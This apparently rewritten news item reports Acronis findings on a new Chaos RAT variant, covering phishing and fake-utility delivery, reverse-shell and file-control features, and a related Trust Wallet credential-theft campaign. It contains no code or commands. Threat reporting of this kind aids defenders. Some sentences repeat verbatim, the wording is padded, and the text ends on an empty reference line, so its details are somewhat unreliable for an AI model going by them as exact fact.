Threat hunters are now calling significant attention to a new variant of the remote access trojan (RAT) known as Chaos RAT. This updated and dangerous malware has been recently used in various cyberattacks targeting both Windows and also versatile Linux operating systems. According to detailed findings from the cybersecurity firm Acronis, the malware artifact may have been distributed by tricking many unsuspecting victims. They were reportedly lured into downloading a supposed network troubleshooting utility designed specifically for common Linux environments to gain initial system access. Chaos RAT is an open-source RAT written in the Golang programming language, offering crucial cross-platform support for Windows and Linux systems.
Inspired by very popular offensive security frameworks such as Cobalt Strike and Sliver, Chaos RAT provides its users an administrative panel. This specialized panel allows users to easily build custom payloads, establish interactive sessions with targeted victims, and remotely control any compromised machines. While work on this particular “remote administration tool” initially started way back in the year 2017, it did not attract significant widespread attention. That situation changed in December 2022, when it was actively put to use in a malicious campaign targeting public-facing web applications. Once installed, Chaos RAT quickly connects to an external server and awaits commands enabling reverse shells and extensive file manipulation capabilities.
This concerning activity also coincides with the emergence of a brand new campaign targeting Trust Wallet users on desktop with counterfeit software.
The attack chains recently observed by Acronis clearly show Chaos RAT is distributed to victims primarily via carefully crafted phishing email campaigns. These malicious emails typically contain harmful links or dangerous attachments designed to deceive the unsuspecting recipients into executing the initial payload. These initial artifacts are specifically engineered to drop a malicious script that can then modify the task scheduler to fetch the malware. An analysis of a recent sample uploaded to VirusTotal in January 2025 from India suggests users are being actively deceived. The administrative panel used to build payloads and manage infected machines was also surprisingly found to be susceptible to critical vulnerabilities.
Chaos RAT is an open-source RAT written in the Golang programming language, offering crucial cross-platform support for Windows and Linux systems.
It is currently not exactly clear who is precisely behind the active use of Chaos RAT in these various real-world cyberattacks. This recent development once again clearly illustrates how many different threat actors continue to effectively weaponize various available open-source tools. Using publicly available malware often helps advanced persistent threat groups blend into the pervasive noise of everyday common cybercrime incidents. This concerning activity also coincides with the emergence of a brand new campaign targeting Trust Wallet users on desktop with counterfeit software. This separate campaign aims to harvest browser credentials, extract critical data from desktop wallets, and also execute arbitrary commands on systems. These trends show evolving risks.
Reference:
